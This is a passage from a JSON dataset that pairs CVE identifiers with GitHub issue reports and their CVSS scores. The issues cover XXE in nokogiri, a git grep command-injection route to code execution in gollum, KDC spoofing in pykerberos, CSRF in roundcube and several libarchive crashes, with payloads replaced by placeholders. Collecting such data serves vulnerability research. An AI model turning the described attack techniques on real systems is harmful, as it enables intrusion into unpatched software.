 The main repos are located at URLTAG and URLTAG The Announcements repo ( URLTAG will contain this bulletin as an issue and will include a link to a discussion issue. You can ask questions in the linked discussion issue. Disclaimer The information provided in this advisory is provided \"as is\" without warranty of any kind. Microsoft disclaims all warranties, either express or implied, including the warranties of merchantability and fitness for a particular purpose. In no event shall Microsoft Corporation or its suppliers be liable for any damages whatsoever including direct, indirect, incidental, consequential, loss of business profits or special damages, even if Microsoft Corporation or its suppliers have been advised of the possibility of such damages. Some states do not allow the exclusion or limitation of liability for consequential or incidental damages so the foregoing limitation may not apply. External Links CVETAG CVETAG Revisions NUMBERTAG APITAG NUMBERTAG Versions that contain the patch updated NUMBERTAG APITAG NUMBERTAG Advisory published. APITAG NUMBERTAG APITAG Updated NUMBERTAG",
  87824. "vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:N/I:N/A:H",
  87825. "severity": "HIGH",
  87826. "baseScore": 7.5,
  87827. "impactScore": 3.6,
  87828. "exploitabilityScore": 3.9
  87829. },
  87830. {
  87831. "CVE_ID": "CVE-2017-8700",
  87832. "Issue_Url_old": "https://github.com/aspnet/Announcements/issues/279",
  87833. "Issue_Url_new": "https://github.com/aspnet/announcements/issues/279",
  87834. "Repo_new": "aspnet/announcements",
  87835. "Issue_Created_At": "2017-11-14T15:25:23Z",
  87836. "description": "Reserved. APITAG issue has been reserved for a potential future security announcement._ This does not mean a security advisory is coming soon, it simply gives us the ability to predict the issue number that will be used in the future.",
  87837. "vectorString": "CVSS:3.0/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:N/A:N",
  87838. "severity": "HIGH",
  87839. "baseScore": 7.5,
  87840. "impactScore": 3.6,
  87841. "exploitabilityScore": 3.9
  87842. },
  87843. {
  87844. "CVE_ID": "CVE-2020-14359",
  87845. "Issue_Url_old": "https://github.com/keycloak/keycloak/issues/12934",
  87846. "Issue_Url_new": "https://github.com/keycloak/keycloak/issues/12934",
  87847. "Repo_new": "keycloak/keycloak",
  87848. "Issue_Created_At": "2022-07-05T22:29:01Z",
  87849. "description": "Contact APITAG Product Security Team and ask them to update CVETAG . Description CVEs can now be updated by a CNA, and Red Hat, the major sponsor of Keycloak, is now a CNA; that means updating CVEs for accuracy should be easier (yeay). CVETAG CVETAG refers to an old sibling project that was deprecated ages ago. It should be reassigned to that product, or at least the CVE should be fixed to reflect its status as affecting not Keycloak but Gatekeeper",
  87850. "vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:L/I:L/A:L",
  87851. "severity": "HIGH",
  87852. "baseScore": 7.3,
  87853. "impactScore": 3.4,
  87854. "exploitabilityScore": 3.9
  87855. },
  87856. {
  87857. "CVE_ID": "CVE-2020-14040",
  87858. "Issue_Url_old": "https://github.com/golang/go/issues/39491",
  87859. "Issue_Url_new": "https://github.com/golang/go/issues/39491",
  87860. "Repo_new": "golang/go",
  87861. "Issue_Created_At": "2020-06-09T22:14:39Z",
  87862. "description": "x/text: UTF NUMBERTAG decoder behaves incorrectly on single byte input. When using UTF NUMBERTAG decoder with BOM to decode a single byte string, the decoder incorrectly returns APITAG . This code can be used to reproduce this issue: ERRORTAG",
  87863. "vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:N/I:N/A:H",
  87864. "severity": "HIGH",
  87865. "baseScore": 7.5,
  87866. "impactScore": 3.6,
  87867. "exploitabilityScore": 3.9
  87868. },
  87869. {
  87870. "CVE_ID": "CVE-2022-24686",
  87871. "Issue_Url_old": "https://github.com/hashicorp/nomad/issues/12036",
  87872. "Issue_Url_new": "https://github.com/hashicorp/nomad/issues/12036",
  87873. "Repo_new": "hashicorp/nomad",
  87874. "Issue_Created_At": "2022-02-09T23:52:57Z",
  87875. "description": "placeholder.",
  87876. "vectorString": "CVSS:3.1/AV:N/AC:H/PR:N/UI:N/S:U/C:N/I:H/A:N",
  87877. "severity": "MEDIUM",
  87878. "baseScore": 5.9,
  87879. "impactScore": 3.6,
  87880. "exploitabilityScore": 2.2
  87881. },
  87882. {
  87883. "CVE_ID": "CVE-2019-10214",
  87884. "Issue_Url_old": "https://github.com/containers/image/issues/654",
  87885. "Issue_Url_new": "https://github.com/containers/image/issues/654",
  87886. "Repo_new": "containers/image",
  87887. "Issue_Created_At": "2019-07-11T10:50:18Z",
  87888. "description": "podman login not working with certificate authentication. Hi, we have an Artifactory running behind a load balancer that uses certificate authentication. When we try to podman login we get the error ERRORTAG When using docker login the login succeeds. When using podman login it tries to reuse the existing login but also fails again: ERRORTAG I guess that the error is probably in this area as the certificates from the APITAG are not used: URLTAG I will try to fix it in the next days but I'm not very familiar with the code base yet so if you see an easy fix we would appreciate that, otherwise I would also appreciate some guidance. Thanks!",
  87889. "vectorString": "CVSS:3.1/AV:N/AC:H/PR:N/UI:N/S:U/C:H/I:N/A:N",
  87890. "severity": "MEDIUM",
  87891. "baseScore": 5.9,
  87892. "impactScore": 3.6,
  87893. "exploitabilityScore": 2.2
  87894. },
  87895. {
  87896. "CVE_ID": "CVE-2002-20001",
  87897. "Issue_Url_old": "https://github.com/mozilla/ssl-config-generator/issues/162",
  87898. "Issue_Url_new": "https://github.com/mozilla/ssl-config-generator/issues/162",
  87899. "Repo_new": "mozilla/ssl-config-generator",
  87900. "Issue_Created_At": "2021-10-23T22:32:53Z",
  87901. "description": "Stop recommending DHE, because of \"dheater\" vulnerability. These guys URLTAG found a way to saturate the server CPU core to NUMBERTAG using as little as NUMBERTAG KB/s of incoming traffic. The pre requisite is that the server supports DHE as the key exchange. Therefore, to avoid creating such a vulnerable configuration, I propose removing DHE from all levels of SSL config.",
  87902. "vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:N/I:N/A:H",
  87903. "severity": "HIGH",
  87904. "baseScore": 7.5,
  87905. "impactScore": 3.6,
  87906. "exploitabilityScore": 3.9
  87907. },
  87908. {
  87909. "CVE_ID": "CVE-2012-6685",
  87910. "Issue_Url_old": "https://github.com/sparklemotion/nokogiri/issues/693",
  87911. "Issue_Url_new": "https://github.com/sparklemotion/nokogiri/issues/693",
  87912. "Repo_new": "sparklemotion/nokogiri",
  87913. "Issue_Created_At": "2012-06-06T09:34:24Z",
  87914. "description": "nokogiri vulnerable to XXE attack when used under c ruby. Using external xml entities you can specify URLs (e.g. HTTP) to be contacted when attacker-supplied XML is parsed. This can be used to trigger URLs on the internal network of an XML parsing service and potentially leak their responses. External xml entities (file, http, etc.) should be completely disabled. CODETAG",
  87915. "vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:N/A:N",
  87916. "severity": "HIGH",
  87917. "baseScore": 7.5,
  87918. "impactScore": 3.6,
  87919. "exploitabilityScore": 3.9
  87920. },
  87921. {
  87922. "CVE_ID": "CVE-2013-20001",
  87923. "Issue_Url_old": "https://github.com/openzfs/zfs/issues/1894",
  87924. "Issue_Url_new": "https://github.com/openzfs/zfs/issues/1894",
  87925. "Repo_new": "openzfs/zfs",
  87926. "Issue_Created_At": "2013-11-22T15:08:00Z",
  87927. "description": "sharenfs and IP NUMBERTAG on Ubuntu NUMBERTAG I am trying to share a zfs filesystem over both IP NUMBERTAG and IP NUMBERTAG but just cannot get it to work. I know the support is there in native NFS, as it works fine for non zfs filesystems. Here is an example: > sudo zfs set PATHTAG disk1/home > sudo exportfs a > showmount e > /home NUMBERTAG home NUMBERTAG home NUMBERTAG home NUMBERTAG home APITAG I have tried the address both with and w/o square brackets, it doesn't make any difference. Any ideas if there is a magic syntax for IP NUMBERTAG addresses? Or is this just a bug/",
  87928. "vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:N/A:N",
  87929. "severity": "HIGH",
  87930. "baseScore": 7.5,
  87931. "impactScore": 3.6,
  87932. "exploitabilityScore": 3.9
  87933. },
  87934. {
  87935. "CVE_ID": "CVE-2013-4144",
  87936. "Issue_Url_old": "https://github.com/wordpress/secure-swfupload/issues/1",
  87937. "Issue_Url_new": "https://github.com/wordpress/secure-swfupload/issues/1",
  87938. "Repo_new": "wordpress/secure-swfupload",
  87939. "Issue_Created_At": "2013-07-03T18:00:54Z",
  87940. "description": "Image object injection vulnerability via APITAG parameter. I've received a few reports today of an image object injection problem in swfupload affecting APITAG I'm filing this public issue here after contacting swfupload EMAILTAG rg and being asked to do so (as this issue is already public knowledge). There's an object injection \"vulnerability\" in swfupload, as shown by this demo URL: FILETAG Known advisories for this issue: URLTAG FILETAG This was tested on APITAG NUMBERTAG As discussed on e mail, there are three basic options: Remove APITAG Restrict APITAG to same origin Ignore the issue My recommendation would be to restrict APITAG to the same origin as the blog site, as swfupload is already deprecated, and I'd rather it be secure but slightly broken than have a known issue that could be used for spoofing or other issues. Thanks!",
  87941. "vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H",
  87942. "severity": "CRITICAL",
  87943. "baseScore": 9.8,
  87944. "impactScore": 5.9,
  87945. "exploitabilityScore": 3.9
  87946. },
  87947. {
  87948. "CVE_ID": "CVE-2014-8174",
  87949. "Issue_Url_old": "https://github.com/redhat-cip/edeploy/issues/230",
  87950. "Issue_Url_new": "https://github.com/redhat-cip/edeploy/issues/230",
  87951. "Repo_new": "redhat-cip/edeploy",
  87952. "Issue_Created_At": "2015-03-17T23:23:07Z",
  87953. "description": "use of HTTP to download sensitive files CVETAG . Found in a past security audit, agreed with Tristan to make public and file issues here. Please see CVETAG edeploy uses HTTP to download a large number of sensitive files which can lead to code execution: PATHTAG value=http://{{ APITAG }}/ PATHTAG echo APITAG { Retries NUMBERTAG HTTP { Proxy URLTAG {HTTP_PROXY} ; }; };\" >> PATHTAG PATHTAG curl o PATHTAG FILETAG ~bpo NUMBERTAG ARCH:=amd NUMBERTAG deb PATHTAG echo \"deb URLTAG $dist security main universe multiverse\" >> PATHTAG PATHTAG echo \"deb FILETAG $dist/updates main\" > PATHTAG PATHTAG wget O FILETAG | do_chroot $target apt key add PATHTAG echo \"deb URLTAG ${dist} main\" > PATHTAG PATHTAG wget O FILETAG | do_chroot $target apt key add PATHTAG echo \"deb URLTAG precise main\" > PATHTAG PATHTAG wget O FILETAG | do_chroot $target apt key add PATHTAG echo \"deb URLTAG ${dist} main\" > PATHTAG PATHTAG wget no verbose URLTAG O PATHTAG PATHTAG FILETAG PATHTAG do_chroot $dir rpm import FILETAG PATHTAG do_chroot $dir rpm import FILETAG PATHTAG URLTAG PATHTAG wget no verbose URLTAG PATHTAG PACKAGES=\"$PACKAGES numpy FILETAG \" PATHTAG PACKAGES=\"$PACKAGES python psutil FILETAG FILETAG \" PATHTAG PACKAGES=\"$PACKAGES FILETAG FILETAG \" PATHTAG curl s S o/configure F section=${SECTION} F FILETAG URLTAG PATHTAG & PATHTAG give_up APITAG exited as failed ($RET_CODE). Cannot get a configuration from URLTAG PATHTAG PATHTAG log APITAG files from URLTAG PATHTAG PATHTAG curl s S URLTAG PATHTAG | gzip d | tar x xattrs selinux C $d || give_up APITAG to download URLTAG PATHTAG PATHTAG curl URLTAG fso /user data m NUMBERTAG retry NUMBERTAG retry delay NUMBERTAG PATHTAG curl s S APITAG F section=${SECTION} F file= APITAG URLTAG PATHTAG || : PATHTAG curl s S F section=${SECTION} F failure=$PROFILE F FILETAG URLTAG PATHTAG PATHTAG s S $SESSION_CURL F FILETAG URLTAG PATHTAG & PATHTAG log APITAG exited as failed ($RET_CODE). 
Cannot get a configuration from URLTAG PATHTAG PATHTAG PACKAGES=\"$PACKAGES FILETAG \" PATHTAG echo \" URLTAG \" PATHTAG echo \" URLTAG \" PATHTAG echo \" FILETAG \" PATHTAG echo \" FILETAG \" PATHTAG wget \" FILETAG \" O PATHTAG Binary file PATHTAG matches PATHTAG URLTAG PATHTAG curl i F name=test F PATHTAG FILETAG PATHTAG curl i F name=test F PATHTAG FILETAG . APITAG page = FILETAG PATHTAG Command line: BOOT_IMAGE=vmlinuz initrd= FILETAG DEBUG NUMBERTAG APITAG APITAG UPLOAD_LOG NUMBERTAG IP=all:dhcp SESSION=smoke NONETWORKTEST NUMBERTAG ONSUCCESS=console ONFAILURE=console |pci=bfsort| PATHTAG Kernel command line: BOOT_IMAGE=vmlinuz initrd= FILETAG DEBUG NUMBERTAG APITAG APITAG UPLOAD_LOG NUMBERTAG IP=all:dhcp SESSION=smoke NONETWORKTEST NUMBERTAG ONSUCCESS=console ONFAILURE=console |pci=bfsort|",
  87954. "vectorString": "CVSS:3.0/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H",
  87955. "severity": "CRITICAL",
  87956. "baseScore": 9.8,
  87957. "impactScore": 5.9,
  87958. "exploitabilityScore": 3.9
  87959. },
  87960. {
  87961. "CVE_ID": "CVE-2014-9489",
  87962. "Issue_Url_old": "https://github.com/gollum/gollum/issues/913",
  87963. "Issue_Url_new": "https://github.com/gollum/gollum/issues/913",
  87964. "Repo_new": "gollum/gollum",
  87965. "Issue_Created_At": "2014-12-04T13:54:16Z",
  87966. "description": "APITAG Remote Code Execution Vulnerability, please update. There was a remote code execution vulnerability in versions of gollum < APITAG (just released). Technically, the bug was in the APITAG gem dependency which was introduced in APITAG , but I suspect that the same exploitable code existed in the APITAG dependency before that version (untested). Please update gollum to APITAG ( gem update gollum ): that will update the dependencies. (If anyone uses APITAG without the gollum frontend, please APITAG ). The bug exploits the fact that grit uses command line calls to git grep to implement search functionality. git grep takes a APITAG or APITAG option that will basically pipe the results of grep to an arbitrary process. For example, in vulnerable versions of gollum, searching for APITAG creates the file APITAG (but any arbitrary command will work, so that an attacker could setup shell access to the exploited server). However, this will only work if grep finds the string master (or whatever is the default branch that gollum uses) in any of the wiki's documents. See here for the vulnerable code and fix: URLTAG Many thanks to MENTIONTAG for reporting this. MENTIONTAG MENTIONTAG MENTIONTAG please have a look and see if I didn't miss anything. One more reason to ditch grit in favour of rugged. EDIT: fixed gollum version numbers",
  87967. "vectorString": "CVSS:3.0/AV:N/AC:L/PR:L/UI:N/S:U/C:H/I:H/A:H",
  87968. "severity": "HIGH",
  87969. "baseScore": 8.8,
  87970. "impactScore": 5.9,
  87971. "exploitabilityScore": 2.8
  87972. },
  87973. {
  87974. "CVE_ID": "CVE-2015-20107",
  87975. "Issue_Url_old": "https://github.com/python/cpython/issues/68966",
  87976. "Issue_Url_new": "https://github.com/python/cpython/issues/68966",
  87977. "Repo_new": "python/cpython",
  87978. "Issue_Created_At": "2015-08-02T08:25:07Z",
  87979. "description": "APITAG document shell command Injection danger in filename parameter. BPO NUMBERTAG CVETAG | : Nosy | MENTIONTAG MENTIONTAG Files | APITAG CVETAG APITAG as image/png at NUMBERTAG by APITAG APITAG APITAG Quote APITAG CVETAG APITAG as text/plain at NUMBERTAG by APITAG APITAG APITAG [mailcap APITAG CVETAG APITAG as application/zip at NUMBERTAG by APITAG mailcap.py patches and diffs for python NUMBERTAG and python NUMBERTAG APITAG APITAG Note: these values reflect the state of the issue at the time it was migrated and might not reflect the current state. APITAG APITAG more details APITAG APITAG APITAG fields: ERRORTAG APITAG fields: ERRORTAG APITAG APITAG",
  87980. "vectorString": "CVSS:3.1/AV:N/AC:L/PR:L/UI:N/S:U/C:L/I:H/A:L",
  87981. "severity": "HIGH",
  87982. "baseScore": 7.6,
  87983. "impactScore": 4.7,
  87984. "exploitabilityScore": 2.8
  87985. },
  87986. {
  87987. "CVE_ID": "CVE-2015-3206",
  87988. "Issue_Url_old": "https://github.com/apple/ccs-pykerberos/issues/31",
  87989. "Issue_Url_new": "https://github.com/apple/ccs-pykerberos/issues/31",
  87990. "Repo_new": "apple/ccs-pykerberos",
  87991. "Issue_Created_At": "2014-01-25T00:01:14Z",
  87992. "description": "APITAG is insecure. _res APITAG originally submitted this as _ ticket NUMBERTAG URLTAG _ The python kerberos APITAG method is badly insecure. It does a kinit (AS REQ) to ask a KDC for a TGT for the given user principal, and interprets the success or failure of that as indicating whether the password is correct. It does not, however, verify that it actually spoke to a trusted KDC: an attacker may simply reply instead with an AS REP which matches the password he just gave you. Imagine you were verifying a password using LDAP authentication rather than Kerberos: you would, of course, use TLS in conjunction with LDAP to make sure you were talking to a real, trusted LDAP server. The same requirement applies here. kinit is not a password verification service. The usual way of doing this is to take the TGT you've obtained with the user's password, and then obtain a ticket for a principal for which the verifier has keys (e.g. a web server processing a username/password form login might get a ticket for its own HTTP/host MENTIONTAG principal), which it can then verify. Note that this requires that the verifier have its own Kerberos identity, which is mandated by the symmetric nature of Kerberos (whereas in the LDAP case, the use of public key cryptography allows anonymous verification). If this is not implemented, the documentation should at least indicate that there is no protection against KDC spoofing attacks here.",
  87993. "vectorString": "CVSS:3.0/AV:N/AC:H/PR:N/UI:N/S:U/C:H/I:H/A:H",
  87994. "severity": "HIGH",
  87995. "baseScore": 8.1,
  87996. "impactScore": 5.9,
  87997. "exploitabilityScore": 2.2
  87998. },
  87999. {
  88000. "CVE_ID": "CVE-2015-4054",
  88001. "Issue_Url_old": "https://github.com/pgbouncer/pgbouncer/issues/42",
  88002. "Issue_Url_new": "https://github.com/pgbouncer/pgbouncer/issues/42",
  88003. "Repo_new": "pgbouncer/pgbouncer",
  88004. "Issue_Created_At": "2015-03-26T15:11:10Z",
  88005. "description": "pgbouncer NUMBERTAG segmentation fault. Hello, we're suffering from a segmentation fault every now and than on APITAG NUMBERTAG with pgbouncer NUMBERTAG The instance is dying with the following message: pgbouncer NUMBERTAG segfault at NUMBERTAG ip NUMBERTAG d NUMBERTAG sp NUMBERTAG fffa NUMBERTAG ea NUMBERTAG error NUMBERTAG in pgbouncer NUMBERTAG pgbouncer NUMBERTAG segfault at NUMBERTAG ip NUMBERTAG d NUMBERTAG sp NUMBERTAG fff NUMBERTAG fbe7b0 error NUMBERTAG in pgbouncer NUMBERTAG pgbouncer NUMBERTAG segfault at NUMBERTAG ip NUMBERTAG d NUMBERTAG sp NUMBERTAG fffaf NUMBERTAG a NUMBERTAG error NUMBERTAG in pgbouncer NUMBERTAG pgbouncer NUMBERTAG segfault at NUMBERTAG ip NUMBERTAG d NUMBERTAG sp NUMBERTAG fffbd NUMBERTAG error NUMBERTAG in pgbouncer NUMBERTAG pgbouncer NUMBERTAG segfault at NUMBERTAG ip NUMBERTAG d NUMBERTAG sp NUMBERTAG ffffe0dc2c0 error NUMBERTAG in pgbouncer NUMBERTAG We've attached gdb to a core file and traced the issue down to an uninitialized struct: Program terminated with signal NUMBERTAG Segmentation fault NUMBERTAG d NUMBERTAG in check_client_passwd (client NUMBERTAG f NUMBERTAG pkt NUMBERTAG ffffe0dc NUMBERTAG at APITAG NUMBERTAG src/client.c: No such file or directory. 
in src/client.c Missing separate debuginfos, use: debuginfo install glibc NUMBERTAG APITAG libevent NUMBERTAG APITAG nss softokn freebl NUMBERTAG APITAG (gdb) bt NUMBERTAG d NUMBERTAG in check_client_passwd (client NUMBERTAG f NUMBERTAG pkt NUMBERTAG ffffe0dc NUMBERTAG at APITAG NUMBERTAG handle_client_startup (client NUMBERTAG f NUMBERTAG pkt NUMBERTAG ffffe0dc NUMBERTAG at APITAG NUMBERTAG in client_proto (sbuf NUMBERTAG f NUMBERTAG evtype=<value optimized out>, data=<value optimized out>) at APITAG NUMBERTAG e in sbuf_call_proto (sbuf=<value optimized out>, event=<value optimized out>) at APITAG NUMBERTAG bb in sbuf_process_pending (sbuf NUMBERTAG f NUMBERTAG at APITAG NUMBERTAG a8 in sbuf_main_loop (sbuf NUMBERTAG f NUMBERTAG skip_recv=<value optimized out>) at APITAG NUMBERTAG in sbuf_accept (sbuf NUMBERTAG f NUMBERTAG sock=<value optimized out>, is_unix=false) at APITAG NUMBERTAG b NUMBERTAG in accept_client (sock NUMBERTAG is_unix=false) at APITAG NUMBERTAG eafc in pool_accept (sock NUMBERTAG flags=<value optimized out>, arg=<value optimized out>) at APITAG NUMBERTAG f NUMBERTAG b NUMBERTAG in event_base_loop () from PATHTAG NUMBERTAG a3 in main_loop_once () at APITAG NUMBERTAG e NUMBERTAG in main (argc=<value optimized out>, argv=<value optimized out>) at APITAG after looking at APITAG we see that the passwd var is valid however the APITAG struct (or APITAG struct) must be invalid: (gdb) printf \"%s\", passwd md5XXXXXXXXXXXXXXXXXXXXXXXXX (gdb) printf \"%s\", user >passwd Cannot access memory at address NUMBERTAG The application log does not show any conclusive info. Please tell me if you need more information. Thanks for help, Wiktor",
  88006. "vectorString": "CVSS:3.0/AV:N/AC:L/PR:N/UI:N/S:U/C:N/I:N/A:H",
  88007. "severity": "HIGH",
  88008. "baseScore": 7.5,
  88009. "impactScore": 3.6,
  88010. "exploitabilityScore": 3.9
  88011. },
  88012. {
  88013. "CVE_ID": "CVE-2015-8916",
  88014. "Issue_Url_old": "https://github.com/libarchive/libarchive/issues/504",
  88015. "Issue_Url_new": "https://github.com/libarchive/libarchive/issues/504",
  88016. "Repo_new": "libarchive/libarchive",
  88017. "Issue_Created_At": "2015-04-11T17:16:06Z",
  88018. "description": "malformed rar crashes bsdtar. Original issue NUMBERTAG URLTAG created by Google Code user APITAG on NUMBERTAG APITAG CODETAG See attachment: FILETAG See attachment: FILETAG See attachment: FILETAG",
  88019. "vectorString": "CVSS:3.0/AV:N/AC:L/PR:N/UI:R/S:U/C:N/I:N/A:H",
  88020. "severity": "MEDIUM",
  88021. "baseScore": 6.5,
  88022. "impactScore": 3.6,
  88023. "exploitabilityScore": 2.8
  88024. },
  88025. {
  88026. "CVE_ID": "CVE-2015-8917",
  88027. "Issue_Url_old": "https://github.com/libarchive/libarchive/issues/505",
  88028. "Issue_Url_new": "https://github.com/libarchive/libarchive/issues/505",
  88029. "Repo_new": "libarchive/libarchive",
  88030. "Issue_Created_At": "2015-04-11T17:16:11Z",
  88031. "description": "malformed cab segfaults bsdtar. Original issue NUMBERTAG URLTAG created by Google Code user APITAG on NUMBERTAG APITAG CODETAG See attachment: FILETAG See attachment: FILETAG See attachment: FILETAG",
  88032. "vectorString": "CVSS:3.0/AV:N/AC:L/PR:N/UI:N/S:U/C:N/I:N/A:H",
  88033. "severity": "HIGH",
  88034. "baseScore": 7.5,
  88035. "impactScore": 3.6,
  88036. "exploitabilityScore": 3.9
  88037. },
  88038. {
  88039. "CVE_ID": "CVE-2015-8927",
  88040. "Issue_Url_old": "https://github.com/libarchive/libarchive/issues/523",
  88041. "Issue_Url_new": "https://github.com/libarchive/libarchive/issues/523",
  88042. "Repo_new": "libarchive/libarchive",
  88043. "Issue_Created_At": "2015-04-11T17:17:10Z",
  88044. "description": "Invalid memory read on zip file in function APITAG after entering empty password. Original issue NUMBERTAG URLTAG created by Google Code user APITAG on NUMBERTAG APITAG ERRORTAG See attachment: FILETAG See attachment: FILETAG",
  88045. "vectorString": "CVSS:3.0/AV:L/AC:L/PR:N/UI:R/S:U/C:N/I:N/A:H",
  88046. "severity": "MEDIUM",
  88047. "baseScore": 5.5,
  88048. "impactScore": 3.6,
  88049. "exploitabilityScore": 1.8
  88050. },
  88051. {
  88052. "CVE_ID": "CVE-2015-8929",
  88053. "Issue_Url_old": "https://github.com/libarchive/libarchive/issues/517",
  88054. "Issue_Url_new": "https://github.com/libarchive/libarchive/issues/517",
  88055. "Repo_new": "libarchive/libarchive",
  88056. "Issue_Created_At": "2015-04-11T17:16:46Z",
  88057. "description": "memory leak in __archive_read_get_extract. Original issue NUMBERTAG URLTAG created by Google Code user APITAG on NUMBERTAG APITAG CODETAG",
  88058. "vectorString": "CVSS:3.0/AV:L/AC:L/PR:N/UI:R/S:U/C:N/I:N/A:H",
  88059. "severity": "MEDIUM",
  88060. "baseScore": 5.5,
  88061. "impactScore": 3.6,
  88062. "exploitabilityScore": 1.8
  88063. },
  88064. {
  88065. "CVE_ID": "CVE-2015-8930",
  88066. "Issue_Url_old": "https://github.com/libarchive/libarchive/issues/522",
  88067. "Issue_Url_new": "https://github.com/libarchive/libarchive/issues/522",
  88068. "Repo_new": "libarchive/libarchive",
  88069. "Issue_Created_At": "2015-04-11T17:17:10Z",
  88070. "description": "Malformed ISO file hangs bsdtar. Original issue NUMBERTAG URLTAG created by Google Code user APITAG on NUMBERTAG APITAG APITAG See attachment: FILETAG",
  88071. "vectorString": "CVSS:3.0/AV:N/AC:L/PR:N/UI:N/S:U/C:N/I:N/A:H",
  88072. "severity": "HIGH",
  88073. "baseScore": 7.5,
  88074. "impactScore": 3.6,
  88075. "exploitabilityScore": 3.9
  88076. },
  88077. {
  88078. "CVE_ID": "CVE-2015-8934",
  88079. "Issue_Url_old": "https://github.com/libarchive/libarchive/issues/521",
  88080. "Issue_Url_new": "https://github.com/libarchive/libarchive/issues/521",
  88081. "Repo_new": "libarchive/libarchive",
  88082. "Issue_Created_At": "2015-04-11T17:17:10Z",
  88083. "description": "Invalid read in function APITAG when unpacking malformed rar. Original issue NUMBERTAG URLTAG created by Google Code user APITAG on NUMBERTAG APITAG ERRORTAG See attachment: FILETAG See attachment: FILETAG",
  88084. "vectorString": "CVSS:3.0/AV:L/AC:L/PR:N/UI:R/S:U/C:N/I:N/A:H",
  88085. "severity": "MEDIUM",
  88086. "baseScore": 5.5,
  88087. "impactScore": 3.6,
  88088. "exploitabilityScore": 1.8
  88089. },
  88090. {
  88091. "CVE_ID": "CVE-2015-9537",
  88092. "Issue_Url_old": "https://github.com/cybersecurityworks/Disclosed/issues/1",
  88093. "Issue_Url_new": "https://github.com/cybersecurityworks/disclosed/issues/1",
  88094. "Repo_new": "cybersecurityworks/disclosed",
  88095. "Issue_Created_At": "2015-08-27T13:22:02Z",
  88096. "description": "Multiple XSS in APITAG Gallery by Photocrati Version NUMBERTAG",
  88097. "vectorString": "CVSS:3.1/AV:N/AC:L/PR:L/UI:R/S:C/C:L/I:L/A:N",
  88098. "severity": "MEDIUM",
  88099. "baseScore": 5.4,
  88100. "impactScore": 2.7,
  88101. "exploitabilityScore": 2.3
  88102. },
  88103. {
  88104. "CVE_ID": "CVE-2016-10530",
  88105. "Issue_Url_old": "https://github.com/airbrake/node-airbrake/issues/70",
  88106. "Issue_Url_new": "https://github.com/airbrake/node-airbrake/issues/70",
  88107. "Repo_new": "airbrake/node-airbrake",
  88108. "Issue_Created_At": "2016-01-26T22:18:46Z",
  88109. "description": "API should support SSL by default. We've run into a few issues where developers do not perform their due diligence and assume MENTIONTAG still supports http by default. This isn't the case and hasn't been for quite some time. I realize there are cases where NUMBERTAG rd party Airbrake compatible backends ( APITAG might support HTTP by default. However, from a security and perception standpoint the reverse should be true: HTTPS by default. I would like to suggest the following updates Change default hosts URLTAG Change default protocol URLTAG Update context to errors section in README URLTAG Update API docs in README URLTAG MENTIONTAG As the maintainer I'm curious what your thoughts are on these changes? I can submit a PR if you'd prefer to discuss these changes that way. /cc MENTIONTAG MENTIONTAG MENTIONTAG MENTIONTAG APITAG",
  88110. "vectorString": "CVSS:3.0/AV:N/AC:H/PR:N/UI:N/S:U/C:H/I:N/A:N",
  88111. "severity": "MEDIUM",
  88112. "baseScore": 5.9,
  88113. "impactScore": 3.6,
  88114. "exploitabilityScore": 2.2
  88115. },
  88116. {
  88117. "CVE_ID": "CVE-2016-1516",
  88118. "Issue_Url_old": "https://github.com/opencv/opencv/issues/5956",
  88119. "Issue_Url_new": "https://github.com/opencv/opencv/issues/5956",
  88120. "Repo_new": "opencv/opencv",
  88121. "Issue_Created_At": "2016-01-13T00:18:16Z",
  88122. "description": "Remote code execution via heap corruption. We've isolated a couple bugs that could allow an attacker to achieve remote code execution on a victim's machine when processing an infected image with APITAG We have more details and would like to responsibly disclose this to a lead developer. Known vulnerable versions: Linux, APITAG NUMBERTAG Unverified but most likely works on all versions.",
  88123. "vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:R/S:U/C:H/I:H/A:H",
  88124. "severity": "HIGH",
  88125. "baseScore": 8.8,
  88126. "impactScore": 5.9,
  88127. "exploitabilityScore": 2.8
  88128. },
  88129. {
  88130. "CVE_ID": "CVE-2016-4069",
  88131. "Issue_Url_old": "https://github.com/roundcube/roundcubemail/issues/4957",
  88132. "Issue_Url_new": "https://github.com/roundcube/roundcubemail/issues/4957",
  88133. "Repo_new": "roundcube/roundcubemail",
  88134. "Issue_Created_At": "2016-01-16T16:36:53Z",
  88135. "description": "Protect attachment downloads against CSRF. APITAG by MENTIONTAG on NUMBERTAG Jan NUMBERTAG UTC as Trac ticket NUMBERTAG Message attachments are downloaded via GET requests (with APITAG ) and therefore can be triggered by a NUMBERTAG rd party site with guessed URLs and an active session in the victims browser. While this doesn't disclose any data to the attacker site, it triggers unwanted file downloads and puts load on the server as well as fills the victims disk if executed repeatedly. We already have CSRF protection means with session based request tokens. Requiring such tokens on download urls would add the necessary protection against these unwanted downloads. APITAG From: URLTAG",
  88136. "vectorString": "CVSS:3.0/AV:N/AC:L/PR:N/UI:R/S:U/C:H/I:H/A:H",
  88137. "severity": "HIGH",
  88138. "baseScore": 8.8,
  88139. "impactScore": 5.9,
  88140. "exploitabilityScore": 2.8
  88141. },
  88142. {
  88143. "CVE_ID": "CVE-2016-9435",
  88144. "Issue_Url_old": "https://github.com/tats/w3m/issues/16",
  88145. "Issue_Url_new": "https://github.com/tats/w3m/issues/16",
  88146. "Repo_new": "tats/w3m",
  88147. "Issue_Created_At": "2016-08-17T09:09:22Z",
  88148. "description": "valgrind found many issues about uninitialised value. There are many noise in libgc. I don't know they are valid or not, so just disable GC by GC_DONT_GC NUMBERTAG and ignore memory leak for now. Minimal test case: ERRORTAG There is different issue for APITAG ERRORTAG If feeding w3m more complex input, there are more. For example, ERRORTAG",
  88149. "vectorString": "CVSS:3.0/AV:N/AC:L/PR:N/UI:R/S:U/C:N/I:N/A:H",
  88150. "severity": "MEDIUM",
  88151. "baseScore": 6.5,
  88152. "impactScore": 3.6,
  88153. "exploitabilityScore": 2.8
  88154. },
